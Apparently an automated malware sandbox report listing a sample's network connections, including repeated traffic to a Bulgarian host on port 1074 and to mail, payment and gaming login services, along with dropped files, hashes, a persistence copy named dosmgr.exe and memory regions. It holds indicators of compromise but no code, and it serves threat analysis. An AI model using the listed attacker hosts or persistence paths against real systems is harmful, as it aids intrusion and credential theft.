US 104.18.34.202:443 api.crunchyroll.com tcp
BG 185.141.63.4:1074 tcp
US 13.107.42.13:443 onedrive.live.com tcp
US 35.244.161.158:80 www.333vvs.com tcp
BG 185.141.63.4:1074 tcp
BG 185.141.63.4:1074 tcp
CA 108.181.20.37:443 files.catbox.moe tcp
BG 185.141.63.4:1074 tcp
RU 193.37.71.22:80 193.37.71.22 tcp
CA 108.181.20.37:443 files.catbox.moe tcp
BG 185.141.63.253:80 ewixgdb.ua tcp
CA 108.181.20.37:443 files.catbox.moe tcp
FR 157.240.196.63:443 i.instagram.com tcp
BG 185.141.63.4:1074 tcp
US 8.8.8.8:53 imap.mail.be udp
CA 108.181.20.37:443 files.catbox.moe tcp
US 129.153.80.87:8855 tcp
GB 212.3.242.82:993 imap.mail.be tcp
BG 185.141.63.4:1074 tcp
BG 185.141.63.4:1074 tcp
US 194.49.94.152:50500 tcp
US 66.225.237.161:443 mi.claro.com.pe tcp
BG 185.141.63.4:1074 tcp
CA 108.181.20.37:443 files.catbox.moe tcp
US 8.8.8.8:53 www.instagram.com udp
NL 157.240.247.174:443 www.instagram.com tcp
BG 185.141.63.4:1074 tcp
US 8.8.8.8:53 www.ssongg12336.cfd udp
HU 194.33.69.111:443 apiv2.jofogas.hu tcp
BG 185.141.63.4:1074 tcp
BG 185.141.63.4:1074 tcp
RU 193.37.71.22:80 193.37.71.22 tcp
NL 142.250.102.138:443 s.youtube.com tcp
BG 185.141.63.4:1074 tcp
BG 185.141.63.4:1074 tcp
US 13.107.42.13:443 onedrive.live.com tcp
BG 185.141.63.4:1074 tcp
US 104.18.34.202:443 api.crunchyroll.com tcp
BG 185.141.63.4:1074 tcp
BE 195.130.132.14:993 imap.telenet.be tcp
BG 185.141.63.4:1074 tcp
BG 185.141.63.4:1074 tcp
CA 108.181.20.37:443 files.catbox.moe tcp
US 151.101.1.21:443 www.paypal.com tcp
BG 185.141.63.4:1074 tcp
RU 193.37.71.22:80 193.37.71.22 tcp
HK 154.216.129.246:80 www.nnxh.net tcp
RU 87.240.190.70:443 api.vk.com tcp
NL 23.222.49.98:443 api.steampowered.com tcp
BG 185.141.63.4:1074 tcp
BG 185.141.63.4:1074 tcp
US 66.225.237.161:443 mi.claro.com.pe tcp
BG 185.141.63.4:1074 tcp
NL 23.222.49.98:80 api.steampowered.com tcp
BG 185.141.63.4:1074 tcp
HU 194.33.69.111:443 apiv2.jofogas.hu tcp
BG 185.141.63.4:1074 tcp
US 8.8.8.8:53 outlook.office365.com udp
US 194.49.94.152:50500 tcp
RU 193.37.71.22:80 193.37.71.22 tcp
CA 108.181.20.37:443 files.catbox.moe tcp
NL 52.97.176.34:993 outlook.office365.com tcp
BG 185.141.63.4:1074 tcp
US 8.8.8.8:53 www.the-roofer.lat udp
DE 64.190.62.22:80 www.the-roofer.lat tcp
CA 108.181.20.37:443 files.catbox.moe tcp
US 104.18.34.202:443 api.crunchyroll.com tcp
BG 185.141.63.4:1074 tcp
US 13.107.42.13:443 onedrive.live.com tcp
BG 185.141.63.4:1074 tcp
CA 108.181.20.37:443 files.catbox.moe tcp
US 8.8.8.8:53 34.176.97.52.in-addr.arpa udp
US 8.8.8.8:53 autoupdate.geo.opera.com udp
US 8.8.8.8:53 22.62.190.64.in-addr.arpa udp
US 8.8.8.8:53 desktop-netinstaller-sub.osp.opera.software udp
BG 185.141.63.4:1074 tcp
BG 185.141.63.4:1074 tcp
US 8.8.8.8:53 www.janenas.top udp
BG 185.141.63.4:1074 tcp
US 8.8.8.8:53 poczta.wp.pl udp
RU 193.37.71.22:80 193.37.71.22 tcp
PL 193.17.41.249:443 poczta.wp.pl tcp
BG 185.141.63.4:1074 tcp
NL 82.145.216.20:443 autoupdate.geo.opera.com tcp
HU 194.33.69.111:443 apiv2.jofogas.hu tcp
BG 185.141.63.4:1074 tcp
US 129.153.80.87:8855 tcp
US 8.8.8.8:53 jnb-efz.ms-acdc.office.com udp
ZA 52.98.18.34:443 jnb-efz.ms-acdc.office.com tcp
NL 82.145.217.121:443 desktop-netinstaller-sub.osp.opera.software tcp
US 8.8.8.8:53 www.a0zu3im002.cfd udp
BG 185.141.63.4:1074 tcp
US 8.8.8.8:53 249.41.17.193.in-addr.arpa udp
US 194.49.94.152:50500 tcp
ZA 52.98.18.34:443 jnb-efz.ms-acdc.office.com tcp
BG 185.141.63.4:1074 tcp
CA 108.181.20.37:443 files.catbox.moe tcp
RU 193.37.71.22:80 193.37.71.22 tcp
BG 185.141.63.4:1074 tcp
US 8.8.8.8:53 34.18.98.52.in-addr.arpa udp
BG 185.141.63.4:1074 tcp
NL 82.145.217.121:443 desktop-netinstaller-sub.osp.opera.software tcp
CA 108.181.20.37:443 files.catbox.moe tcp
US 13.107.42.13:443 onedrive.live.com tcp
BG 185.141.63.4:1074 tcp
NL 82.145.216.20:443 autoupdate.geo.opera.com tcp
CA 108.181.20.37:443 files.catbox.moe tcp
US 8.8.8.8:53 m-api.nexon.com udp
JP 54.92.86.54:443 m-api.nexon.com tcp
ZA 52.98.18.34:443 jnb-efz.ms-acdc.office.com tcp
US 104.18.34.202:443 api.crunchyroll.com tcp
BG 185.141.63.4:1074 tcp
BG 185.141.63.4:1074 tcp
BG 185.141.63.4:1074 tcp
RU 91.194.2.86:80 www.finebb.net tcp
US 8.8.8.8:53 steamcommunity.com udp
RU 193.37.71.22:80 193.37.71.22 tcp
US 8.8.8.8:53 download.opera.com udp
US 8.8.8.8:53 mail.be udp
NL 23.222.49.98:443 steamcommunity.com tcp
BG 185.141.63.4:1074 tcp
US 8.8.8.8:53 54.86.92.54.in-addr.arpa udp
NL 82.145.216.24:443 download.opera.com tcp
GB 212.3.242.82:143 mail.be tcp
BG 185.141.63.4:1074 tcp
ZA 52.98.22.18:443 jnb-efz.ms-acdc.office.com tcp
ZA 52.98.22.18:443 jnb-efz.ms-acdc.office.com tcp
BG 185.141.63.4:1074 tcp
BG 185.141.63.4:1074 tcp
US 8.8.8.8:53 24.216.145.82.in-addr.arpa udp
FR 157.240.196.63:443 i.instagram.com tcp
BG 185.141.63.4:1074 tcp
CA 108.181.20.37:443 files.catbox.moe tcp
HU 194.33.69.111:443 apiv2.jofogas.hu tcp
BG 185.141.63.4:1074 tcp
HK 34.92.57.107:80 www.yf168vip.com tcp
CA 108.181.20.37:443 files.catbox.moe tcp
GB 212.3.242.82:993 mail.be tcp
BG 185.141.63.4:1074 tcp
US 8.8.8.8:53 18.22.98.52.in-addr.arpa udp
US 13.107.42.13:443 onedrive.live.com tcp
RU 193.37.71.22:80 193.37.71.22 tcp
US 194.49.94.152:50500 tcp
BG 185.141.63.4:1074 tcp
CA 108.181.20.37:443 files.catbox.moe tcp
US 8.8.8.8:53 datastream.myvnc.com udp
RU 91.215.85.63:5225 datastream.myvnc.com tcp
BG 185.141.63.4:1074 tcp
BG 185.141.63.4:1074 tcp
CA 108.181.20.37:443 files.catbox.moe tcp
BG 185.141.63.4:1074 tcp
US 13.248.169.48:80 www.spacecargo.net tcp
RU 193.37.71.22:80 193.37.71.22 tcp
BG 185.141.63.4:1074 tcp
US 151.101.1.21:443 www.paypal.com tcp
BG 185.141.63.4:1074 tcp
US 8.8.8.8:53 logowanie.interia.pl udp
US 8.8.8.8:53 imap.kpnmail.nl udp
PL 217.74.65.74:443 logowanie.interia.pl tcp
BG 185.141.63.4:1074 tcp
US 129.153.80.87:8855 tcp
NL 195.121.65.133:993 imap.kpnmail.nl tcp
NL 23.222.49.98:443 steamcommunity.com tcp
BG 185.141.63.4:1074 tcp
BG 185.141.63.4:1074 tcp
BG 185.141.63.4:1074 tcp
US 194.49.94.152:50500 tcp
CA 108.181.20.37:443 files.catbox.moe tcp
BG 185.141.63.4:1074 tcp
US 203.161.61.170:80 www.tecverse.xyz tcp
US 8.8.8.8:53 74.65.74.217.in-addr.arpa udp
BG 185.141.63.4:1074 tcp
US 13.107.42.13:443 onedrive.live.com tcp
CA 108.181.20.37:443 files.catbox.moe tcp
RU 193.37.71.22:80 193.37.71.22 tcp
BG 185.141.63.4:1074 tcp
NL 84.116.6.3:993 imap.ziggo.nl tcp
BG 185.141.63.4:1074 tcp
HU 194.33.69.111:443 apiv2.jofogas.hu tcp
BG 185.141.63.4:1074 tcp
US 8.8.8.8:53 oauth.vk.com udp
RU 87.240.129.135:443 oauth.vk.com tcp
BG 185.141.63.4:1074 tcp
RU 87.240.129.135:443 oauth.vk.com tcp
BG 185.141.63.4:1074 tcp
US 8.8.8.8:53 xo.nate.com udp
KR 203.226.254.20:443 xo.nate.com tcp
BG 185.141.63.4:1074 tcp
BG 185.141.63.4:1074 tcp
US 8.8.8.8:53 www.layar111.com udp
US 35.208.239.184:80 www.layar111.com tcp
BG 185.141.63.4:1074 tcp
RU 193.37.71.22:80 193.37.71.22 tcp
US 8.8.8.8:53 135.129.240.87.in-addr.arpa udp
CA 108.181.20.37:443 files.catbox.moe tcp
US 8.8.8.8:53 imap.op.pl udp
PL 213.180.142.218:993 imap.op.pl tcp
BG 185.141.63.4:1074 tcp
CA 108.181.20.37:443 files.catbox.moe tcp
US 8.8.8.8:53 outlook.office365.com udp
BG 185.141.63.4:1074 tcp
CA 108.181.20.37:443 files.catbox.moe tcp
NL 40.99.205.50:993 outlook.office365.com tcp
BG 185.141.63.4:1074 tcp
US 8.8.8.8:53 218.142.180.213.in-addr.arpa udp
US 8.8.8.8:53 imap.tele2.nl udp
BG 185.141.63.4:1074 tcp

Files

C:\ProgramData\AMMYY\settings3.bin

MD5 4cb889e527b0d0781a17f6c2dd968129
SHA1 6a6a55cd5604370660f1c1ad1025195169be8978
SHA256 2658cd46dd49335e739cafa31ff2ec63f3315b65ecc171a0f7612713d3ac702b
SHA512 297d2c05d2ac950faeb519d3e7bc56ea9d9fcab65b5dfdbba2720be8eddc8b2d5ead3dc7c122b82d6937be6c2d7bb88872dd7b80961138571245fba381daac3f

C:\ProgramData\AMMYY\hr3

MD5 179282f5e407267e4bce1b11d33b20e7
SHA1 9dc7cacb1a04489f4b8fd73a82eed8deb9aea4c5
SHA256 827ea92c94d0d126114399bcdcc584b3dea63e4712a46295e862642350770fe8
SHA512 434b538709289254d4e63731d614cf51de253d06e37307ee51d994caa3d21cc9d88030e1dfca63d324864cee22c38cec8fc25aac7750b687883683f12d45c69a

C:\ProgramData\AMMYY\hr

MD5 c978bec938a2268ece330e75d666fd58
SHA1 2b12027b3d5fa0c7d5234cbb2387c81a598f7cb3
SHA256 b9f62f1b4437238ddf655a8d4f25b3d9110716e2e4a7affc40da3b2dd19f7c99
SHA512 d49ce9ed9ca5a92ff5ffc1b305453cba0fb0d57d43f7d74335de5a10fa8cdc583a6e1a5cfdb98322541272292df035d3dad98d6ab63aaf955d96fa1ff78f5a0b

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat

MD5 0629525c94f6548880f5f3a67846755e
SHA1 40ef667fc04bb1c0ae4bf2c17ded88594f0f4423
SHA256 812576f4a24f399abbd54b83ba7f404f021d4a7d2ec0fd2f988ebf4cbf8477ee
SHA512 f74d2e4a65a152f46852eb78dd70a958fdfb8c14e060ca41ffa783b7362e44659cc5fc73f59f3edb1f1d817000b85de7c1860512aa65d937eb5a0a8d9e5890fa

\??\pipe\LOCAL\crashpad_1196_MRHRVFNRLIMKUFDQ

MD5 d41d8cd98f00b204e9800998ecf8427e
SHA1 da39a3ee5e6b4b0d3255bfef95601890afd80709
SHA256 e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855
SHA512 cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

MD5 c49108b5885bdd2c99dabc20d451d99d
SHA1 0c49047f593548d1d47230e7bf3db01118f656a1
SHA256 645e74e43f2c07bc937e703eb8e60315c050f74033735c0b8747a9b82dd26d75
SHA512 24a6d84240bfb86e8a991434dc1fe6c6f2a82e5b83cb59051ac052f3fc63f13d0d9c6410c998c93e07f927871ebad2db0e5a258c84967ee9d39ac035174091f1

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\data_reduction_proxy_leveldb\CURRENT

MD5 6752a1d65b201c13b62ea44016eb221f
SHA1 58ecf154d01a62233ed7fb494ace3c3d4ffce08b
SHA256 0861415cada612ea5834d56e2cf1055d3e63979b69eb71d32ae9ae394d8306cd
SHA512 9cfd838d3fb570b44fc3461623ab2296123404c6c8f576b0de0aabd9a6020840d4c9125eb679ed384170dbcaac2fa30dc7fa9ee5b77d6df7c344a0aa030e0389

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State

MD5 ff2036653f54740784764f634ef19530
SHA1 17ca87c551f8956c6e65bad88158bf09b30d6e31
SHA256 822aaaf427637870728509e88e49e3bc3a8d012e5bd7fb33c5290884e4b50afe
SHA512 2e17b9205079b1995915aeed08cedf254116687e77a8d41bb775ce07f52af07c07bfe5006744e9f9789ad979d91d152ab800c52528073295d3b2d20dfddacd29

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

MD5 32661c380a0ece3dffbf821ba45d5ad6
SHA1 986409fc460a3f6a85572718f70f08ecc67c515c
SHA256 8584c468888b5b9190b20986f255925f8ba67f8d5d0d3646cb82cff41b5960f4
SHA512 831c80c26350912fd97e8d2a4f51b7fea61dc642c0481daafdbde2df48d7cc23483be74cf5a9da468d5bc03856c055a6728d69df6d5c04afecbefd633faeedbc

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Network Persistent State

MD5 285252a2f6327d41eab203dc2f402c67
SHA1 acedb7ba5fbc3ce914a8bf386a6f72ca7baa33c6
SHA256 5dfc321417fc31359f23320ea68014ebfd793c5bbed55f77dab4180bbd4a2026
SHA512 11ce7cb484fee66894e63c31db0d6b7ef66ad0327d4e7e2eb85f3bcc2e836a3a522c68d681e84542e471e54f765e091efe1ee4065641b0299b15613eb32dcc0d

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Secure Preferences

MD5 fd20981c7184673929dfcab50885629b
SHA1 14c2437aad662b119689008273844bac535f946c
SHA256 28b7a1e7b492fff3e5268a6cd480721f211ceb6f2f999f3698b3b8cbd304bb22
SHA512 b99520bbca4d2b39f8bedb59944ad97714a3c9b8a87393719f1cbc40ed63c5834979f49346d31072c4d354c612ab4db9bf7f16e7c15d6802c9ea507d8c46af75

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

MD5 a5540f3a67620f980f6b676ece79a5d2
SHA1 bb42aa3913c9362f7dc8479ac538f3157bef202c
SHA256 83d1fc5944e97bec10e50131e963166a94b7151cfbdd5cba4de79eef85b25361
SHA512 852cdcdcf53dab36f170238e083afcad792e37266c16f29be2abaf7facf0ae626aa54d19a5607afd3720de8149cc81ee8b4ee5ef0f16fdbb880485f8deee5113

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

MD5 bd4a251bb92679b649e65da42f347855
SHA1 d0d815f097ecd94de25d261e9b54c25fb9325abf
SHA256 60b17d02c779ac5e52a7082088adce349c0d9ce9543cae5064e1388cc3012a4c
SHA512 853eeb9c8e6e4fc2122e3eefefbbadf6645ed5185fb88dc6f09f97bcfc4faf31fda983ceaf35215d10aeb0550616279d346fe581d4c160065c393743ea35b798

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Network Persistent State

MD5 00a455d9d155394bfb4b52258c97c5e5
SHA1 2761d0c955353e1982a588a3df78f2744cfaa9df
SHA256 45a13c77403533b12fbeeeb580e1c32400ca17a32e15caa8c8e6a180ece27fed
SHA512 9553f8553332afbb1b4d5229bbf58aed7a51571ab45cbf01852b36c437811befcbc86f80ec422f222963fa7dabb04b0c9ae72e9d4ff2eeb1e58cde894fbe234f

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

MD5 fb70bf413686cb3e695f0c04cc3d7adf
SHA1 c87eef4b91f6ec6b92d7cfb71b55599ae15b1a71
SHA256 5a75d789dc90321a193e92a4da777e9e4fb0bc69984c9b5c5adf252345eb84e3
SHA512 8b980965a82e4285a2dfc639a1d7be83217901330d170b0297d1746ce06acaf5384e919b4535c4a051d5a3fd4763c07e8dcac08a89eb21ea4416c32ff7719273

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\TransportSecurity~RFe599282.TMP

MD5 ea4238e8d9cd8a707d542ffb0c773e56
SHA1 b30236741ab389da9cd23ac6ece8c51a7ac5bd56
SHA256 fc640b7fe3ab61e2678f41156dd08e14ab807d975b81ff46d332955ab3a61537
SHA512 a162fbfb46ed1884925d2bee9c2077050d82a1cc68976d73201738225e51aaae89aae03c8429f124b9c88d2d9dc54b053138b2f68aec48d76281e1ab9e75c217

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\TransportSecurity

MD5 d9f1525e2f2cdfbd8779f39dea1c0fca
SHA1 a532e8aca0e9b8872de2d71c9c6819df7fc356a7
SHA256 23ba0830096bb48d51f1fdf84ca739f5cea3094ad6b466e8fc13b8013a9342ce
SHA512 7d907fdbf3c7770e62029d9ea8c537699618f68aee7daf7e24e3923bff6ddcacf9bb2faff023106cbc96a1b5e5105c694e26b5df3f3ee10766c00d922d3d0ba2

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Service Worker\CacheStorage\379f1cbab5b08b6fc9e08681e42d8be311441c88\index.txt

MD5 8a40f0b52203d8dd50609798845a16f3
SHA1 a161706e5e777f159dee9a2d8397a667676cd174
SHA256 a83ff328379c9de828ad460a5def36c6f6d84c666d9d2e48cfdfd1f3ce8a5b56
SHA512 5b3924ac910931d50f8d927167928e17a22a898f3da7ccbd854515769ff65cd935fba3990d6a6859ce97d4095fd9545f6089182c736647a61917e3ea6cf7d869

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Service Worker\CacheStorage\379f1cbab5b08b6fc9e08681e42d8be311441c88\index.txt

MD5 98ff94e74be6e9a0a3ce95b93a99d5fc
SHA1 f7404fd66920142b235c13c1f18b8845df1556c5
SHA256 dd028e2fcea8ed3ed29b952b888e8f015fc199bcbac215b1c4da1798411d6a72
SHA512 735a4403de907ec84be1da26497b3ae8df2b994b8b83a7ed966bec9a050c74be397aa3ad192104c0340907e7cce6dbeef2945655d84bc0333b7a246aefbb1f1a

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Code Cache\js\index-dir\the-real-index

MD5 b064202ed02b57bd741ec3ea95b336cd
SHA1 1744559c1992ba62ea230177ea4cd6650faf286b
SHA256 080f047a4fc8f1e693219926287ebeee6ebf9464258c7a6baeffac11318c15bf
SHA512 202a865075953712dc999f96505e5829149d66440ca2a37788714d75d31c7653de61bbee198ef67dbfe28b997f375223519c43e37e0a56f61cdb9363ca1cda03

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State

MD5 5413bfd53006a8d25cabe51602bed883
SHA1 09b6953cce1017d86ea7697f7ced830ab3dc6bb2
SHA256 8b7b37fb2d8428f01cdf2ed9a70fdc6607bcd01ec26ece24166bae29dd5ef678
SHA512 212f7fa165e3ba6de0db9e3ef0d99bc9343d619cf58740386fbece89459c28eea9c43be4b4d33cb2c683a1fbde1aae423593806abf7de4b7d0be3263d9c8bd77

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

MD5 4b52f6f42388c5ae44a9776420b2fee9
SHA1 2fdee310c6381e495a9d756ca7bd12958dafb5e5
SHA256 9cf02e3e825214a733eb2f19b99fd03ec093089da68cd1dadc900d6d4a2c3189
SHA512 db35800a45136b6f314c838cfae3701888bae9899864a92146dea502f1d1dc8ed1119f28ca98bcbf9282f4e208f282f2bfa35e9566fe675e05935860206a38e2

C:\Users\Admin\Downloads\Unconfirmed 757511.crdownload

MD5 84db47223e6adf32df20a25481027186
SHA1 5f66c312eb78f7dcc4dc7232e735aef11226c5e2
SHA256 3d858e9748f570f3b29cc04b776e56426dc017bc77b5e9e29b177908aff76a9e
SHA512 932985e5160a8887929b034325bbc1e84ae86fe7a506ff91214111b7b0e9ef8fd7ded13e544b9f5868344cf282276dde3af7edc84e7e4bdd31fd9425a1c9a3ac

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Network Persistent State

MD5 4a05e495e2aaea90cdaf0454f3105422
SHA1 21e46d30ff662c70fcdad75f0cbdadb88f33055d
SHA256 d5181a54b459acc4de0a225f83e2795038fe3f6d5190bb4baa4d188314970b81
SHA512 394688bf9b8f1a89c0c67dcea0d8163fd5e794382b027f1f094f67c1b9ed5683e03753fc7cfd6905a43e261e719723bf4172b84c454a98f52362e7fd4e2b3633

C:\Users\Admin\Downloads\2023-11-23-13.zip

MD5 84db47223e6adf32df20a25481027186
SHA1 5f66c312eb78f7dcc4dc7232e735aef11226c5e2
SHA256 3d858e9748f570f3b29cc04b776e56426dc017bc77b5e9e29b177908aff76a9e
SHA512 932985e5160a8887929b034325bbc1e84ae86fe7a506ff91214111b7b0e9ef8fd7ded13e544b9f5868344cf282276dde3af7edc84e7e4bdd31fd9425a1c9a3ac

C:\Users\Admin\Downloads\2023-11-23-13\496bbeff36c20e17f2967fb96527b48ab329d1cac12347fdbd8692c46dd36786.exe

MD5 980746bbc209911ddbaaff46d856a78f
SHA1 283b8da4e00d54668ff2c98645a4f6f0853a0d35
SHA256 496bbeff36c20e17f2967fb96527b48ab329d1cac12347fdbd8692c46dd36786
SHA512 1a40fa8878e916442b7b3acb875cb80bbcb6e5810ad272d8fa8a5df4f757b392cb2ab86ec7b271df25f981914652913ccbded6c96834f84bab1eaafd07da3574

C:\Users\Admin\Downloads\2023-11-23-13\496bbeff36c20e17f2967fb96527b48ab329d1cac12347fdbd8692c46dd36786.exe

MD5 980746bbc209911ddbaaff46d856a78f
SHA1 283b8da4e00d54668ff2c98645a4f6f0853a0d35
SHA256 496bbeff36c20e17f2967fb96527b48ab329d1cac12347fdbd8692c46dd36786
SHA512 1a40fa8878e916442b7b3acb875cb80bbcb6e5810ad272d8fa8a5df4f757b392cb2ab86ec7b271df25f981914652913ccbded6c96834f84bab1eaafd07da3574

memory/3988-479-0x00000000004E0000-0x0000000000596000-memory.dmp

memory/3988-480-0x0000000072A90000-0x0000000073240000-memory.dmp

memory/3988-481-0x00000000054B0000-0x0000000005A54000-memory.dmp

memory/3988-482-0x0000000004FA0000-0x0000000005032000-memory.dmp

memory/3988-483-0x0000000005130000-0x0000000005140000-memory.dmp

memory/3988-484-0x0000000005140000-0x000000000514A000-memory.dmp

memory/3988-485-0x0000000005200000-0x000000000529C000-memory.dmp

memory/3988-486-0x00000000052A0000-0x00000000052B8000-memory.dmp

memory/3988-487-0x00000000052C0000-0x00000000052C6000-memory.dmp

C:\Users\Admin\Downloads\2023-11-23-13\881aa4a7e41df5264bbfc6e4dab64666051de4b22dd7a5c2bcfac93f9f8fbf3c.rar

MD5 d629c9c574869fe38647fb838efdf4a8
SHA1 28f95ab915164471a8474d035c9535dd9d7478d6
SHA256 881aa4a7e41df5264bbfc6e4dab64666051de4b22dd7a5c2bcfac93f9f8fbf3c
SHA512 801d62df0f59421970ac98a90eb357cca9eba9409366931830e6f7b038f276f09e2b3b9b9678dce93008a3896cf0a885ababaaae6285d0fecd1d97d4a0e1048d

memory/3988-489-0x0000000005490000-0x000000000549A000-memory.dmp

memory/3988-490-0x000000000CFA0000-0x000000000D020000-memory.dmp

C:\Users\Admin\Downloads\2023-11-23-13\496bbeff36c20e17f2967fb96527b48ab329d1cac12347fdbd8692c46dd36786.exe

MD5 980746bbc209911ddbaaff46d856a78f
SHA1 283b8da4e00d54668ff2c98645a4f6f0853a0d35
SHA256 496bbeff36c20e17f2967fb96527b48ab329d1cac12347fdbd8692c46dd36786
SHA512 1a40fa8878e916442b7b3acb875cb80bbcb6e5810ad272d8fa8a5df4f757b392cb2ab86ec7b271df25f981914652913ccbded6c96834f84bab1eaafd07da3574

C:\Users\Admin\Downloads\2023-11-23-13\496bbeff36c20e17f2967fb96527b48ab329d1cac12347fdbd8692c46dd36786.exe

MD5 980746bbc209911ddbaaff46d856a78f
SHA1 283b8da4e00d54668ff2c98645a4f6f0853a0d35
SHA256 496bbeff36c20e17f2967fb96527b48ab329d1cac12347fdbd8692c46dd36786
SHA512 1a40fa8878e916442b7b3acb875cb80bbcb6e5810ad272d8fa8a5df4f757b392cb2ab86ec7b271df25f981914652913ccbded6c96834f84bab1eaafd07da3574

memory/3852-493-0x0000000000400000-0x0000000000438000-memory.dmp

C:\Users\Admin\Downloads\2023-11-23-13\496bbeff36c20e17f2967fb96527b48ab329d1cac12347fdbd8692c46dd36786.exe

MD5 980746bbc209911ddbaaff46d856a78f
SHA1 283b8da4e00d54668ff2c98645a4f6f0853a0d35
SHA256 496bbeff36c20e17f2967fb96527b48ab329d1cac12347fdbd8692c46dd36786
SHA512 1a40fa8878e916442b7b3acb875cb80bbcb6e5810ad272d8fa8a5df4f757b392cb2ab86ec7b271df25f981914652913ccbded6c96834f84bab1eaafd07da3574

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\496bbeff36c20e17f2967fb96527b48ab329d1cac12347fdbd8692c46dd36786.exe.log

MD5 8ec831f3e3a3f77e4a7b9cd32b48384c
SHA1 d83f09fd87c5bd86e045873c231c14836e76a05c
SHA256 7667e538030e3f8ce2886e47a01af24cb0ea70528b1e821c5d8832c5076cb982
SHA512 26bffa2406b66368bd412bf25869a792631455645992cdcade2dbc13a2e56fb546414a6a9223b94c96c38d89187add6678d4779a88b38b0c9e36be8527b213c3

memory/3852-497-0x0000000072A90000-0x0000000073240000-memory.dmp

memory/3988-498-0x0000000072A90000-0x0000000073240000-memory.dmp

memory/3852-499-0x0000000005640000-0x0000000005650000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\tmpE560.tmp

MD5 843bdc4681b1f42ca33aedc7ff56622d
SHA1 75606b436b18c70f189eec7160971c5ce8d8e4e8
SHA256 cb61fa18a25917abb472647ae261ec8d803b8b004a90ff72b62a6ab9c97869c2
SHA512 1e2aef7aa4fd0f1839c0b135a0cfcadf8abe5762002706702267946efb36f5214a050a4749b225e3c28041c031f942b57c1b09ebf0b7e76c63f345f2cacd49f5

C:\Users\Admin\AppData\Local\Temp\tmpE62C.tmp

MD5 8f5713b14cee3089852f6c8d2a7a7d57
SHA1 8bffbea05715c6434ad593cce8a2c737f80ff788
SHA256 ab3ce102242c3144f87bcbfe83984a478821cd09e62c0e5211b2ab37dde02d2c
SHA512 82bd2378c2d6bb34a1ad3f2d26bfea583fc8403691bed6668521ba3e8bc7bdbdf142f872ddbc8e5251550f47c9bbee4eb3d0d6096f80d85259082cf68a454c72

memory/3852-507-0x00000000057F0000-0x00000000057FA000-memory.dmp

memory/3852-508-0x0000000005A10000-0x0000000005A2E000-memory.dmp

memory/3852-509-0x0000000006900000-0x000000000690A000-memory.dmp

memory/3852-512-0x0000000007060000-0x0000000007072000-memory.dmp

memory/3852-513-0x0000000007070000-0x000000000708A000-memory.dmp

memory/3852-514-0x00000000070A0000-0x00000000070AE000-memory.dmp

memory/3852-516-0x00000000070C0000-0x00000000070CE000-memory.dmp

memory/3852-515-0x00000000070B0000-0x00000000070C2000-memory.dmp

memory/3852-517-0x00000000070D0000-0x00000000070DC000-memory.dmp

memory/3852-518-0x00000000070E0000-0x00000000070F4000-memory.dmp

memory/3852-519-0x00000000070F0000-0x0000000007100000-memory.dmp

memory/3852-520-0x0000000007110000-0x0000000007124000-memory.dmp

memory/3852-521-0x0000000007130000-0x000000000713E000-memory.dmp

memory/3852-522-0x0000000007140000-0x000000000716E000-memory.dmp

memory/3852-523-0x0000000007170000-0x0000000007184000-memory.dmp

memory/3852-524-0x0000000007350000-0x00000000073B6000-memory.dmp

memory/3148-526-0x00000161A8AA0000-0x00000161A8AA1000-memory.dmp

memory/3148-528-0x00000161A8AA0000-0x00000161A8AA1000-memory.dmp

memory/3148-527-0x00000161A8AA0000-0x00000161A8AA1000-memory.dmp

memory/3148-533-0x00000161A8AA0000-0x00000161A8AA1000-memory.dmp

memory/3148-532-0x00000161A8AA0000-0x00000161A8AA1000-memory.dmp

memory/3148-534-0x00000161A8AA0000-0x00000161A8AA1000-memory.dmp

memory/3148-535-0x00000161A8AA0000-0x00000161A8AA1000-memory.dmp

memory/3148-536-0x00000161A8AA0000-0x00000161A8AA1000-memory.dmp

memory/3148-537-0x00000161A8AA0000-0x00000161A8AA1000-memory.dmp

memory/3148-538-0x00000161A8AA0000-0x00000161A8AA1000-memory.dmp

C:\Program Files (x86)\DOS Manager\dosmgr.exe

MD5 980746bbc209911ddbaaff46d856a78f
SHA1 283b8da4e00d54668ff2c98645a4f6f0853a0d35
SHA256 496bbeff36c20e17f2967fb96527b48ab329d1cac12347fdbd8692c46dd36786
SHA512 1a40fa8878e916442b7b3acb875cb80bbcb6e5810ad272d8fa8a5df4f757b392cb2ab86ec7b271df25f981914652913ccbded6c96834f84bab1eaafd07da3574

memory/3852-540-0x0000000072A90000-0x0000000073240000-memory.dmp

memory/3852-541-0x0000000005640000-0x0000000005650000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State

MD5 6a5c19a254750ae3498ca9933f8ccf34
SHA1 385883f5abd2be6b3519e4a4b0879798b04b0ff6
SHA256 74ef1d1a734f0fa5874a949a8145fb3df3b9c20723d999887a50a1d8f9abe5ed
SHA512 d70181f2f43e97dfea0b9e61e0370c10dd94988c59c1b5fb9a73dd0d70e51be5535b3e73d8905d96e31ebb89477bc778ebd223bd20f988f6714c7031a625e989

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State

